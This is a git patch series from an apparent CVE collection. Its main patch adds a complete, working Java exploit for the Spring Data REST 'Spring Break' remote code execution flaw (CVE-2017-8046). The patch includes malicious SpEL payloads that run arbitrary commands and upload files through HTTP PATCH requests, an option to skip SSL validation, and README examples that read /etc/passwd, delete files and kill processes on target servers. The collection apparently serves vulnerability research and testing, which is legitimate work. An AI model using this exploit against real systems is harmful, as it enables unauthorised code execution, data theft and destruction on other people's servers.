z|0-7dSH@q{o_{h*f2I!pYsNokKmSVjYl7iV0xRtA5dNBH_*4I%ea~Me>L24*g^>_{
zNB=LD>ffvU&*HyK)j!4ce_Q;o7VEz!{4!bpB-H=+2!FL)|2^iH>G~%I0_k^W=}%|(
zFBa^-NBuHk|3n%84^e-yWdA+xmnr)vuJ3<=`xh4NzsLSEY5&AhBLB}O^w(Yf9s9?^
z`~NN5ztjJ<Y5R-*$5%tz{~cZVH!NHQX;83VaM+)RJ?PIHrvU(<0AOWdF=AwAXEioq
iGG%5o{KU*^Vrat5$jJ8d4HI?-c0*<cPGdt3=KlxO?rgUJ

literal 0
HcmV?d00001

-- 
Gitee


From 548318b270d13f0a63261ad9ca3313116cf6d3f8 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn>
Date: Mon, 10 Apr 2023 10:57:06 +0000
Subject: [PATCH 04/13] add cve-2017-8046
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: 王烁林 <17377137@buaa.edu.cn>
---
 cve/java-spring/2017/CVE-2017-8046/.gitignore |  60 ++
 .../2017/CVE-2017-8046/LICENSE.txt            |  13 +
 cve/java-spring/2017/CVE-2017-8046/README.md  | 163 +++++
 .../CVE-2017-8046/SpringBreakCve20178046.java | 651 ++++++++++++++++++
 cve/java-spring/2017/CVE-2017-8046/pom.xml    |  68 ++
 5 files changed, 955 insertions(+)
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/.gitignore
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/README.md
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java
 create mode 100644 cve/java-spring/2017/CVE-2017-8046/pom.xml

diff --git a/cve/java-spring/2017/CVE-2017-8046/.gitignore b/cve/java-spring/2017/CVE-2017-8046/.gitignore
new file mode 100644
index 00000000..6dc7e51e
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/.gitignore
@@ -0,0 +1,60 @@
+###################
+# Compiled source #
+###################
+*.com
+*.dll
+*.exe
+*.o
+*.so
+*.bat
+
+############
+# Packages #
+############
+# it's better to unpack these files and commit the raw source
+# git has its own built in compression methods
+*.7z
+*.dmg
+*.gz
+*.iso
+*.rar
+*.tar
+*.zip
+
+######################
+# Logs and databases #
+######################
+*.log
+*.sqlite
+
+######################
+# OS generated files #
+######################
+.DS_Store*
+ehthumbs.db
+Icon?
+Thumbs.db
+*~
+
+######################
+# Other repositories #
+######################
+.svn
+.\#*
+
+####################
+# Java programming #
+####################
+build
+doc
+generated
+target
+.project
+.classpath
+.settings
+*.class
+*.jar
+*.war
+*.ear
+junit*.properties
+/bin/
diff --git a/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
new file mode 100644
index 00000000..92904254
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/LICENSE.txt
@@ -0,0 +1,13 @@
+Copyright 2018 Antonio Francesco Sardella
+
+Licensed under the Apache License, Version 2.0 (the "License");
+you may not use this file except in compliance with the License.
+You may obtain a copy of the License at
+
+    http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing, software
+distributed under the License is distributed on an "AS IS" BASIS,
+WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+See the License for the specific language governing permissions and
+limitations under the License.
\ No newline at end of file
diff --git a/cve/java-spring/2017/CVE-2017-8046/README.md b/cve/java-spring/2017/CVE-2017-8046/README.md
new file mode 100644
index 00000000..60caa5e0
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/README.md
@@ -0,0 +1,163 @@
+# spring-break_cve-2017-8046
+
+This is a Java program that exploits **Spring Break** vulnerability (**CVE-2017-8046**).
+
+This software is written to have as less external dependencies as possible.
+
+## DISCLAIMER
+
+**This tool is intended for security engineers and appsec guys for security assessments. Please use this tool responsibly. I do not take responsibility for the way in which any one uses this application. I am NOT responsible for any damages caused or any crimes committed by using this tool.**
+
+## Vulnerability info
+
+* **CVE-ID**: CVE-2017-8046
+* **Link**: [https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046)
+* **Description**: Malicious *PATCH* requests submitted to *spring-data-rest* servers in **Pivotal Spring Data REST** versions prior to **2.5.12**, **2.6.7**, **3.0 RC3**, **Spring Boot** versions prior to **2.0.0M4**, and **Spring Data** release trains prior to **Kay-RC3** can use specially crafted JSON data to run arbitrary Java code.
+* **Vendor link**: [https://pivotal.io/security/cve-2017-8046](https://pivotal.io/security/cve-2017-8046)
+
+## How to generate an executable JAR
+
+Here some steps to follow in order to generate an executable JAR, with all dependencies into it, that can be used to launch the exploit.
+
+### with Maven
+
+Following Maven command can be launched:
+
+```
+mvn clean compile package
+```
+
+### with Eclipse
+
+Following steps can be done:
+1. solve all external dependencies/libraries;
+1. right click on the Eclipse project and go to `Run As > Run Configurations`;
+1. right click on `Java Application` then on `New`;
+1. choose a name and set the main class to `com.afs.exploit.spring.SpringBreakCve20178046`;
+1. click on `Apply` button;
+1. close the window and go back to the main Eclipse window;
+1. right click on the Eclipse project and click on `Export...`;
+1. find and choose `Runnable JAR file` (under `Java` branch);
+1. in the following window:
+   1. choose the correct `Launch configuration` created before;
+   1. choose an `Export destination`;
+   1. choose the option `Extract required libraries into generated JAR`;
+   1. click on `Finish` button.
+
+## Help
+
+```
+Usage:
+   java -jar spring-break_cve-2017-8046.jar [options]
+Description:
+   Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).
+Options:
+   -h, --help
+      Prints this help and exits.
+   -u, --url [target_URL]
+      The target URL where the exploit will be performed.
+      You have to choose an existent resource.
+   -cmd, --command [command_to_execute]
+      The command that will be executed on the remote machine.
+   -U, --upload [file_to_upload]
+      File to upload to the remote machine. Will be uploaded to the current working
+      directory of the java process. Warning: this will only succeed on a server running
+      JRE-1.7 or later.
+   --remote-upload-directory [/some/existing/path/]
+      Optional. Server will attempt to write the uploaded file to this directory on the
+      filesystem. Specified directory must exist and be writeable.
+   --cookies [cookies]
+      Optional. Cookies passed into the request, e.g. authentication cookies.
+   -H, --header [custom_header]
+      Optional. Custom header passed into the request, e.g. authorization header.
+   -k
+      Skip SSL validation
+   --clean
+      Optional. Removes error messages in output due to the usage of the
+      exploit. It could hide error messages if the request fails for other reasons.
+   --error-stream
+      Optional. In case of errors the command will fail and the error stream will
+      not be returned. This option can be used to relaunch the remote command
+      returning the error stream.
+   -v, --verbose
+      Optional. Increase verbosity.
+```
+
+
+## Examples
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln01.foo.com/api/v1/entity/123" --command ipconfig
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln02.foo.com/api/v2/entity/42" --command ipconfig --cookies "JSESSIONID=qwerty0123456789"
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar -v --url "https://vuln02.foo.com/api/v2/entity/42" --upload file.sh --remote-upload-directory /tmp
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln03.foo.com/asd/api/v1/entity/1" --command dir --cookies "JSESSIONID=qwerty0123456789;foo=bar"
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln04.foo.com/asd/api/v1/entity/1" --command "dir C:\Windows" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln05.foo.com/asd/api/v1/entity/1" --command "copy /b NUL ..\..\pwned.txt" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln06.foo.com/asd/api/v1/entity/1" --command "ping -c 3 www.google.it" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln07.foo.com/asd/api/v1/entity/1" --command "ps aux" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln08.foo.com/asd/api/v1/entity/1" --command "uname -a" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln09.foo.com/asd/api/v1/entity/1" --command "ls -l" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln10.foo.com/asd/api/v1/entity/1" --command "wget https://www.google.com" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln11.foo.com/asd/api/v1/entity/1" --command "rm index.html" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln12.foo.com/asd/api/v1/entity/1" --command "cat /etc/passwd" --clean
+```
+
+```
+java -jar spring-break_cve-2017-8046.jar --url "https://vuln13.foo.com/asd/api/v1/entity/1" --command "kill -9 5638" --clean
+```
+
+Please note that the referenced resource/URL must exist!
+
+## Vulnerable application
+
+A vulnerable application can be found [here](https://github.com/m3ssap0/SpringBreakVulnerableApp).
+
+## Authors
+
+* **Antonio Francesco Sardella** - *main implementation* - [m3ssap0](https://github.com/m3ssap0)
+* **Yassine Tioual** - *HTTP header enhancement* - [nisay759](https://github.com/nisay759)
+* **Robin Wagenaar** - *for the suggestion to use patch operation 'remove' instead of 'replace' and for the file upload functionality* - [RobinWagenaar](https://github.com/RobinWagenaar)
+
+## License
+
+This project is licensed under the Apache License Version 2.0 - see the **LICENSE.txt** file for details.
+
+## Acknowledgments
+
+* [Man Yue Mo](https://lgtm.com/blog/spring_data_rest_CVE-2017-8046_ql) the security researcher who discovered the vulnerability
\ No newline at end of file
diff --git a/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java
new file mode 100644
index 00000000..7488b58c
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/SpringBreakCve20178046.java
@@ -0,0 +1,651 @@
+// Exploit Title: RCE in PATCH requests in Spring Data REST
+// Date: 2018-03-10
+// Exploit Author: Antonio Francesco Sardella
+// Vendor Homepage: https://pivotal.io/
+// Software Link: https://projects.spring.io/spring-data-rest/
+// Version: Spring Data REST versions prior to 2.6.9 (Ingalls SR9), 3.0.1 (Kay SR1)
+// Tested on: 'Microsoft Windows 7' and 'Xubuntu 17.10.1' with 'spring-boot-starter-data-rest' version '1.5.6.RELEASE'
+// CVE: CVE-2017-8046
+// Category: Webapps
+// Repository: https://github.com/m3ssap0/spring-break_cve-2017-8046
+// Example Vulnerable Application: https://github.com/m3ssap0/SpringBreakVulnerableApp
+// Vulnerability discovered and reported by: Man Yue Mo from Semmle and lgtm.com
+
+package com.afs.exploit.spring;
+
+import java.io.BufferedReader;
+import java.io.File;
+import java.io.IOException;
+import java.io.InputStreamReader;
+import java.net.URI;
+import java.net.URISyntaxException;
+import java.util.ArrayList;
+import java.util.List;
+
+import org.apache.commons.codec.binary.Base64;
+import org.apache.commons.io.FileUtils;
+import org.apache.http.HttpResponse;
+import org.apache.http.client.HttpClient;
+import org.apache.http.client.methods.HttpPatch;
+import org.apache.http.entity.StringEntity;
+import org.apache.http.impl.client.HttpClientBuilder;
+import org.apache.http.ssl.SSLContextBuilder;
+import org.apache.http.conn.ssl.TrustSelfSignedStrategy;
+import org.apache.http.conn.ssl.SSLConnectionSocketFactory;
+import org.apache.http.conn.ssl.NoopHostnameVerifier;
+
+/**
+ * This is a Java program that exploits Spring Break vulnerability (CVE-2017-8046).
+ * This software is written to have as less external dependencies as possible.
+ * DISCLAIMER: This tool is intended for security engineers and appsec guys for security assessments. Please
+ * use this tool responsibly. I do not take responsibility for the way in which any one uses this application.
+ * I am NOT responsible for any damages caused or any crimes committed by using this tool.
+ * ..................
+ * . CVE-ID ........: CVE-2017-8046
+ * . Link ..........: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
+ * . Description ...: Malicious PATCH requests submitted to spring-data-rest servers in Pivotal Spring Data REST
+ * .................. versions prior to 2.5.12, 2.6.9, 3.0 RC3, Spring Boot versions prior to 2.0.0M4, and Spring
+ * .................. Data release trains prior to Kay-RC3 can use specially crafted JSON data to run arbitrary
+ * .................. Java code.
+ * ..................
+ * 
+ * @author Antonio Francesco Sardella
+ */
+public class SpringBreakCve20178046 {
+
+    /**
+     * Version string.
+     */
+    private static final String VERSION = "v1.6 (2018-10-13)";
+
+    /**
+     * The JSON Patch object.
+     */
+    private static String JSON_PATCH_OBJECT = "[{ \"op\" : \"remove\", \"path\" : \"%s\", \"value\" : \"pwned\" }]";
+
+    /**
+     * This is a way to bypass the split and 'replace'
+     * logic performed by the framework on slashes.
+     */
+    private static String SLASH = "(new java.lang.String(new char[]{0x2F}))";
+
+    /**
+     * Malicious SpEL-script for executing commands.
+     */
+    private static String COMMAND_PAYLOAD;
+    static {
+        COMMAND_PAYLOAD = "T(org.springframework.util.StreamUtils).copy(";
+        COMMAND_PAYLOAD += "T(java.lang.Runtime).getRuntime().exec(";
+        COMMAND_PAYLOAD += "(";
+        COMMAND_PAYLOAD += "T(java.lang.System).getProperty(\\\"os.name\\\").toLowerCase().contains(\\\"win\\\")";
+        COMMAND_PAYLOAD += "?";
+        COMMAND_PAYLOAD += "\\\"cmd \\\"+" + SLASH + "+\\\"c \\\"";
+        COMMAND_PAYLOAD += ":";
+        COMMAND_PAYLOAD += "\\\"\\\"";
+        COMMAND_PAYLOAD += ")+";
+        COMMAND_PAYLOAD += "%s"; // The encoded command will be placed here.
+        COMMAND_PAYLOAD += ").get%sStream()";
+        COMMAND_PAYLOAD += ",";
+        COMMAND_PAYLOAD += "T(org.springframework.web.context.request.RequestContextHolder).currentRequestAttributes()";
+        COMMAND_PAYLOAD += ".getResponse().getOutputStream()";
+        COMMAND_PAYLOAD += ").x";
+    }
+
+    /**
+     * Malicious SpEL-script for uploading files (like scripts, binaries, etc).
+     */
+    private static String FILEUPLOAD_PAYLOAD;
+    static {
+        // Classes java.nio.file.* are only available in Java 7+.
+        FILEUPLOAD_PAYLOAD = "T(java.nio.file.Files).write(";
+        FILEUPLOAD_PAYLOAD += "T(java.nio.file.Paths).get(%s),";
+        FILEUPLOAD_PAYLOAD += "T(java.util.Base64).getDecoder().decode(\\\"%s\\\")";
+        FILEUPLOAD_PAYLOAD += ").x";
+    }
+
+    /**
+     * Error cause string that can be used to "clean the response."
+     */
+    private static String ERROR_CAUSE = "{\"cause";
+
+    /**
+     * Constant that will be used to get input stream.
+     */
+    private static String INPUT_STREAM = "Input";
+
+    /**
+     * Constant that will be used to get error stream.
+     */
+    private static String ERROR_STREAM = "Error";
+
+    /**
+     * The target URL.
+     */
+    private URI url;
+
+    /**
+     * Whether to skipSSL or not, default set to false
+     */
+    private boolean skipSSL;
+
+    /**
+     * The command that will be executed on the remote machine.
+     */
+    private String command;
+
+    /**
+     * Cookies that will be passed.
+     */
+    private String cookies;
+
+    /**
+     * Flag used to remove error messages in output due to
+     * the usage of the exploit. It could hide error messages
+     * if the request fails for other reasons.
+     */
+    private boolean cleanResponse;
+
+    /**
+     * This flag can be used to retrieve the error stream
+     * in case the launched remote command fails unexpectedly.
+     */
+    private boolean errorStream;
+
+    /**
+     * Verbosity flag.
+     */
+    private boolean verbose;
+
+    /**
+     * Custom headers that will be passed.
+     */
+    private List<String> customHeaders = new ArrayList<String>();
+
+    /**
+     * Path that will point to a file on the local filesystem, which will
+     * be uploaded. Uploads cannot be used in conjunction with commands in the
+     * same request.
+     */
+    private File localFileToUpload;
+
+    /**
+     * Server will upload the file to this location, e.g. /tmp or C:\TEMP. This path
+     * will be encoded to ensure that Spring will not convert slashes to dots.
+     */
+    private String remoteUploadDirectory;
+
+    /**
+     * Default constructor.
+     */
+    public SpringBreakCve20178046() {
+        this.verbose = false;
+        this.cleanResponse = false;
+        this.errorStream = false;
+        this.skipSSL = false;
+    }
+
+    /**
+     * Performs the exploit.
+     * 
+     * @throws IOException
+     *             If something bad occurs during HTTP GET.
+     */
+    public void exploit() throws IOException {
+        checkInput();
+        printInput();
+        String payload = preparePayload();
+        String response = httpPatch(payload);
+        printOutput(response);
+    }
+
+    /**
+     * Checks the input.
+     */
+    private void checkInput() {
+        if (this.url == null) {
+            throw new IllegalArgumentException("URL must be passed.");
+        }
+
+        if ((isEmpty(this.command) && this.localFileToUpload == null) || (!isEmpty(this.command) && this.localFileToUpload != null)) {
+            throw new IllegalArgumentException("Either a command must be passed, or a file must be selected for upload.");
+        }
+    }
+
+    /**
+     * Prints input if verbose flag is true.
+     */
+    private void printInput() {
+        if (isVerbose()) {
+            System.out.println("[*] Target URL ........: " + this.url);
+            if (!isEmpty(this.command)) {
+                System.out.println("[*] Command ...........: " + this.command);
+            }
+            if (this.localFileToUpload != null) {
+                System.out.println("[*] File to upload ....: " + this.localFileToUpload.getAbsolutePath());
+                if (!isEmpty(this.remoteUploadDirectory)) {
+                    System.out.println("[*] Remote upload dir .: " + this.remoteUploadDirectory);
+                }
+            }
+            System.out.println("[*] Cookies ...........: " + (isEmpty(this.cookies) ? "(no cookies)" : this.cookies));
+            System.out.println("[*] Headers ...........: " + (this.customHeaders == null || this.customHeaders.isEmpty() ? "(no headers)" : "(" + this.customHeaders.size() + " headers)"));
+            if (this.customHeaders != null && !this.customHeaders.isEmpty()) {
+                for (String header : this.customHeaders) {
+                    System.out.println("               > " + header);
+                }
+            }
+            System.out.println("[*] Clean response ....: " + this.cleanResponse);
+            System.out.println("[*] Ret error stream ..: " + this.errorStream);
+            System.out.println("[*] Verbose ...........: " + this.verbose);
+        }
+    }
+
+    /**
+     * Prepares the payload.
+     * 
+     * @return The malicious payload that will be injected.
+     */
+    private String preparePayload() {
+        System.out.println("[*] Preparing payload.");
+        String payload = null;
+
+        // Send a command to the server:
+        if (!isEmpty(this.command)) {
+            String encodedCommand = encode(this.command); // Encoding inserted command.
+            String maliciousSpEL = String.format(COMMAND_PAYLOAD, encodedCommand, isErrorStream() ? ERROR_STREAM : INPUT_STREAM);
+            payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL); // Placing payload into JSON Patch object.
+        }
+
+        // Upload a file to the server:
+        else if (this.localFileToUpload != null) {
+            try {
+                // Remote preparing filename / directory.
+                String filename = this.localFileToUpload.getName();
+                if (remoteUploadDirectory != null) {
+                    filename = remoteUploadDirectory + filename;
+                    filename = encode(filename);
+                }
+
+                // Reading file content to byte[] instead of string avoids potential text encoding issues.
+                byte[] rawFileContent = FileUtils.readFileToByteArray(this.localFileToUpload);
+                String encodedFileContent = Base64.encodeBase64String(rawFileContent);
+                String maliciousSpEL = String.format(FILEUPLOAD_PAYLOAD, filename, encodedFileContent);
+                payload = String.format(JSON_PATCH_OBJECT, maliciousSpEL);
+
+            } catch (IOException e) {
+                throw new RuntimeException(e);
+            }
+        }
+
+        if (isVerbose()) {
+            System.out.println("[*] Payload ...........: " + payload);
+        }
+
+        return payload;
+    }
+
+    /**
+     * Encodes the inserted command.
+     * 
+     * @return The encoded command.
+     */
+    private String encode(String command) {
+        StringBuffer encodedCommand = new StringBuffer("(new java.lang.String(new char[]{");
+
+        int commandLength = command.length();
+        for (int i = 0; i < commandLength; i++) {
+            encodedCommand.append((int) command.charAt(i));
+            if (i + 1 < commandLength) {
+                encodedCommand.append(",");
+            }
+        }
+
+        encodedCommand.append("}))");
+
+        if (isVerbose()) {
+            System.out.println("[*] Encoded command ...: " + encodedCommand.toString());
+        }
+
+        return encodedCommand.toString();
+    }
+
+    /**
+     * HTTP PATCH operation on the target passing the malicious payload.
+     * 
+     * @param payload
+     *            The malicious payload.
+     * @return The response as a string.
+     * @throws IOException
+     *             If something bad occurs during HTTP GET.
+     */
+    private String httpPatch(String payload) throws IOException {
+        System.out.println("[*] Sending payload.");
+
+        // Preparing PATCH operation.
+        HttpClientBuilder clientBuilder = HttpClientBuilder.create();
+
+        // Disable SSL Verification
+        if(this.url.getScheme().equalsIgnoreCase("https") && this.skipSSL){
+            try{
+                SSLContextBuilder sslBuilder = new SSLContextBuilder();
+                sslBuilder.loadTrustMaterial(null, new TrustSelfSignedStrategy());
+                // Since certificates contain hostnames, not ip addresses, if we try https://ipAddress
+                // a SSLPeerUnverifiedException would be thrown because hostname in certificate does not match
+                // ip used in https://ipAddress, to avoid that error we need to use the overloaded constructor taking as second arg NoopHostnameVerifier.
+                SSLConnectionSocketFactory sslConnectionFactory = new SSLConnectionSocketFactory(sslBuilder.build(), NoopHostnameVerifier.INSTANCE);
+                clientBuilder.setSSLSocketFactory(sslConnectionFactory);
+            } catch(Exception exception) {
+                // Errors that may be thrown: KeyManagementException, KeyStoreException, NoSuchAlgorithmException, SSLPeerUnverifiedException
+                throw new RuntimeException(exception);
+            }
+        }
+
+        HttpClient client = clientBuilder.build();
+
+        HttpPatch patch = new HttpPatch(this.url);
+        patch.setHeader("User-Agent", "Mozilla/5.0");
+        patch.setHeader("Accept-Language", "en-US,en;q=0.5");
+        patch.setHeader("Content-Type", "application/json-patch+json"); // This is a JSON Patch.
+        if (!isEmpty(this.cookies)) {
+            patch.setHeader("Cookie", this.cookies);
+        }
+        if (!customHeaders.isEmpty()) {
+            for (String header : this.customHeaders) {
+                String key = header.split(":")[0];
+                String value = header.split(":")[1];
+                patch.setHeader(key, value);
+            }
+        }
+        patch.setEntity(new StringEntity(payload));
+
+        // Response string.
+        StringBuffer response = new StringBuffer();
+
+        // Executing PATCH operation.
+        HttpResponse httpResponse = client.execute(patch);
+        if (httpResponse != null) {
+
+            // Reading response code.
+            if (httpResponse.getStatusLine() != null) {
+                int responseCode = httpResponse.getStatusLine().getStatusCode();
+                System.out.println("[*] HTTP " + responseCode);
+            } else {
+                System.out.println("[!] HTTP response code can't be read.");
+            }
+
+            // Reading response content.
+            if (httpResponse.getEntity() != null && httpResponse.getEntity().getContent() != null) {
+                BufferedReader in = new BufferedReader(new InputStreamReader(httpResponse.getEntity().getContent()));
+                String inputLine;
+
+                while ((inputLine = in.readLine()) != null) {
+                    response.append(inputLine);
+                    response.append(System.getProperty("line.separator"));
+                }
+                in.close();
+            } else {
+                System.out.println("[!] HTTP response content can't be read.");
+            }
+
+        } else {
+            System.out.println("[!] HTTP response is null.");
+        }
+
+        return response.toString();
+    }
+
+    /**
+     * Prints output.
+     * 
+     * @param response
+     *            Response that will be printed.
+     */
+    private void printOutput(String response) {
+        if (!isEmpty(response)) {
+            System.out.println("[*] vvv Response vvv");
+
+            // Cleaning response (if possible).
+            if (isCleanResponse() && response.contains(ERROR_CAUSE)) {
+                String cleanedResponse = response.split("\\" + ERROR_CAUSE)[0];
+                System.out.println(cleanedResponse);
+            } else {
+                System.out.println(response);
+            }
+
+            System.out.println("[*] ^^^ ======== ^^^");
+        }
+    }
+
+    /**
+     * Checks if an input string is null/empty or not.
+     * 
+     * @param input
+     *            The input string to check.
+     * @return True if the string is null or empty, false otherwise.
+     */
+    private boolean isEmpty(String input) {
+        boolean isEmpty;
+
+        if (input == null || input.trim().length() < 1) {
+            isEmpty = true;
+        } else {
+            isEmpty = false;
+        }
+
+        return isEmpty;
+    }
+
+    /* Getters and setters. */
+
+    public boolean isVerbose() {
+        return verbose;
+    }
+
+    public void setVerbose(boolean verbose) {
+        this.verbose = verbose;
+    }
+
+    public void setUrl(String url) throws URISyntaxException {
+        if (isEmpty(url)) {
+            throw new IllegalArgumentException("URL must be not null and not empty.");
+        }
+
+        this.url = new URI(url.trim());
+    }
+
+    public void setCommand(String command) {
+        if (isEmpty(command)) {
+            throw new IllegalArgumentException("Command must be not null and not empty.");
+        }
+
+        this.command = command.trim();
+    }
+
+    public void setCookies(String cookies) {
+        if (cookies != null) {
+            cookies = cookies.trim();
+        }
+
+        this.cookies = cookies;
+    }
+
+    public void setSkipSSL(boolean skipSSL){
+        this.skipSSL = skipSSL;
+    }
+
+    public void setCustomHeader(String customHeader) {
+        if (customHeader != null && customHeader.contains(":") && !customHeader.startsWith(":") && !customHeader.endsWith(":")) {
+            customHeader = customHeader.trim();
+            this.customHeaders.add(customHeader);
+        }
+    }
+
+    public boolean isCleanResponse() {
+        return cleanResponse;
+    }
+
+    public void setCleanResponse(boolean cleanResponse) {
+        this.cleanResponse = cleanResponse;
+    }
+
+    public boolean isErrorStream() {
+        return errorStream;
+    }
+
+    public void setErrorStream(boolean errorStream) {
+        this.errorStream = errorStream;
+    }
+
+    public void setLocalFileToUpload(String localFileToUpload) {
+        if (isEmpty(localFileToUpload)) {
+            throw new IllegalArgumentException("Filename must not be null and not empty.");
+        }
+
+        File upload = new File(localFileToUpload);
+        if (!upload.exists() || !upload.isFile() || !upload.canRead()) {
+            throw new IllegalArgumentException("File to upload does not exist or is not readable: " + upload.getAbsolutePath());
+        }
+
+        this.localFileToUpload = upload;
+    }
+
+    public void setRemoteUploadDirectory(String remoteUploadDirectory) {
+        if (!remoteUploadDirectory.endsWith("/")) {
+            remoteUploadDirectory += "/";
+        }
+        this.remoteUploadDirectory = remoteUploadDirectory;
+    }
+
+    /**
+     * Shows the program help.
+     */
+    public static final void help() {
+        System.out.println("Usage:");
+        System.out.println("   java -jar spring-break_cve-2017-8046.jar [options]");
+        System.out.println("Description:");
+        System.out.println("   Exploiting 'Spring Break' Remote Code Execution (CVE-2017-8046).");
+        System.out.println("Options:");
+        System.out.println("   -h, --help");
+        System.out.println("      Prints this help and exits.");
+        System.out.println("   -u, --url [target_URL]");
+        System.out.println("      The target URL where the exploit will be performed.");
+        System.out.println("      You have to choose an existent resource.");
+        System.out.println("   -cmd, --command [command_to_execute]");
+        System.out.println("      The command that will be executed on the remote machine.");
+        System.out.println("   -U, --upload [file_to_upload]");
+        System.out.println("      File to upload to the remote machine. Will be uploaded to the current working");
+        System.out.println("      directory of the Java process. Warning: this will only succeed on a server running");
+        System.out.println("      JRE-1.7 or later.");
+        System.out.println("   --remote-upload-directory [/some/existing/path/]");
+        System.out.println("      Optional. Server will attempt to write the uploaded file to this directory on the");
+        System.out.println("      filesystem. Specified directory must exist and be writeable.");
+        System.out.println("   --cookies [cookies]");
+        System.out.println("      Optional. Cookies passed into the request, e.g. authentication cookies.");
+        System.out.println("   -H, --header [custom_header]");
+        System.out.println("      Optional. Custom header passed into the request, e.g. authorization header.");
+        System.out.println("   -k");
+        System.out.println("      Skip SSL validation");
+        System.out.println("   --clean");
+        System.out.println("      Optional. Removes error messages in output due to the usage of the");
+        System.out.println("      exploit. It could hide error messages if the request fails for other reasons.");
+        System.out.println("   --error-stream");
+        System.out.println("      Optional. In case of errors the command will fail and the error stream will");
+        System.out.println("      not be returned. This option can be used to relaunch the remote command");
+        System.out.println("      returning the error stream.");
+        System.out.println("   -v, --verbose");
+        System.out.println("      Optional. Increase verbosity.");
+    }
+
+    /**
+     * Main method.
+     * 
+     * @param args
+     *            Input arguments
+     */
+    public static void main(String[] args) {
+        try {
+            System.out.println("'Spring Break' RCE (CVE-2017-8046) - " + VERSION);
+            SpringBreakCve20178046 o = new SpringBreakCve20178046();
+
+            if (args.length > 0) {
+                for (int i = 0; i < args.length; i++) {
+
+                    String p = args[i];
+
+                    if (("-h".equals(p) || "--help".equals(p)) && i == 0) {
+                        SpringBreakCve20178046.help();
+                        return;
+                    } else if ("-u".equals(p) || "--url".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("URL must be passed.");
+                        }
+                        o.setUrl(args[++i]);
+
+                    } else if ("-U".equals(p) || "--upload".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("File must be passed, if specified.");
+                        }
+                        o.setLocalFileToUpload(args[++i].trim());
+
+                    } else if ("--remote-upload-directory".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Remote directory must be passed, if specified.");
+                        }
+                        o.setRemoteUploadDirectory(args[++i].trim());
+
+                    } else if ("-cmd".equals(p) || "--command".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Command must be passed.");
+                        }
+                        o.setCommand(args[++i]);
+
+                    } else if ("--cookies".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Cookies must be passed, if specified.");
+                        }
+                        o.setCookies(args[++i]);
+
+                    } else if ("-k".equals(p)) {
+
+                        o.setSkipSSL(true);
+
+                    } else if ("-H".equals(p) || "--header".equals(p)) {
+
+                        if (i + 1 > args.length - 1) {
+                            throw new IllegalArgumentException("Custom header must be passed, if specified.");
+                        }
+                        o.setCustomHeader(args[++i]);
+
+                    } else if ("--clean".equals(p)) {
+                        o.setCleanResponse(true);
+                    } else if ("--error-stream".equals(p)) {
+                        o.setErrorStream(true);
+                    } else if ("-v".equals(p) || "--verbose".equals(p)) {
+                        o.setVerbose(true);
+                    }
+
+                }
+
+                // Performing the exploit.
+                o.exploit();
+
+            } else { // Wrong number of arguments.
+                SpringBreakCve20178046.help();
+                return;
+            }
+
+        } catch (URISyntaxException use) {
+            System.out.println("[!] Input error (URI syntax exception): " + use.getMessage());
+        } catch (IllegalArgumentException iae) {
+            System.out.println("[!] Input error (illegal argument): " + iae.getMessage());
+        } catch (Exception e) {
+            System.out.println("[!] Unexpected exception: " + e.getMessage());
+            e.printStackTrace();
+        }
+    }
+
+}
diff --git a/cve/java-spring/2017/CVE-2017-8046/pom.xml b/cve/java-spring/2017/CVE-2017-8046/pom.xml
new file mode 100644
index 00000000..0cb3f6ed
--- /dev/null
+++ b/cve/java-spring/2017/CVE-2017-8046/pom.xml
@@ -0,0 +1,68 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
